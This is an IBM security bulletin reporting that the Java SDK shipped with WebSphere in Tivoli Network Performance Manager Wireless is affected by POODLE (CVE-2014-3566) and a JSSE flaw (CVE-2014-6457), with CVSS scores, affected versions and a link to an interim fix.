IBMD14EDC67B834C0978CC140C1E958B367C219D7AC61409ECE5A3D8285E6A6E34ESecurity Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server shipped with IBM Tivoli Network Performance Manager Wireless Platform (CVE-2014-3566 and CVE-2014-6457)
3.4 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
Summary
There are multiple vulnerabilities in IBM® SDK Java™ Technology Edition that is shipped with IBM WebSphere Application Server as a component of IBM Tivoli Network Performance Manager Wireless Platform . This also includes a fix for the Padding Oracle On Downgraded Legacy Encryption (POODLE) SSLv3 vulnerability (CVE-2014-3566). These issues were disclosed as part of the IBM Java SDK updates in October 2014
Vulnerability Details
The following advisories are included in the IBM® SDK Java™ Technology Edition and WebSphere Application Server may be vulnerable to them:-
CVE ID: CVE-2014-3566
DESCRIPTION: Product could allow a remote attacker to obtain sensitive information, caused
by a design error when using the SSLv3 protocol. A remote user with the ability to conduct a
man-in-the-middle attack could exploit this vulnerability via a POODLE (Padding Oracle On
Downgraded Legacy Encryption) attack to decrypt SSL sessions and access the plaintext of
encrypted connections.
CVSS Base Score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/97013> for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVE ID: CVE-2014-6457
DESCRIPTION: An unspecified vulnerability related to the JSSE component has partial
confidentiality impact, partial integrity impact, and no availability impact.
CVSS Base Score: 4
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/97148> for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:H/Au:N/C:P/I:P/A:N)
Please consult the security bulletin Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server Oct 2014 CPU for vulnerability details.
Affected Products and Versions
Affected Product and Version(s)
| Product and Version shipped as component
—|—
Tivoli Network Performance Manager 1.4| Bundled the Jazz for Service Management version 1.1.0.2, IBM WebSphere version 8.5.0.1 and the JRE from IBM SDK Java 2 Technology Edition Version 7.
Tivoli Network Performance Manager 1.3.2| Bundled the TIP version 2.1.0.x, IBM WebSphere version 7.0.0.x and the JRE from IBM SDK Java 2 Technology Edition Version 6.
Tivoli Network Performance Manager 1.3.1| Bundled the TIP version 2.1.0.x, IBM WebSphere version 7.0.0.x and the JRE from IBM SDK Java 2 Technology Edition Version 6.
Remediation/Fixes
Upgrade your SDK to an interim fix level as determined below:
<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>
| CPE | Name | Operator | Version |
|---|---|---|---|
| ibm netcool performance manager | eq | 1.3 | |
| ibm netcool performance manager | eq | 1.4 |
Related
3.4 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N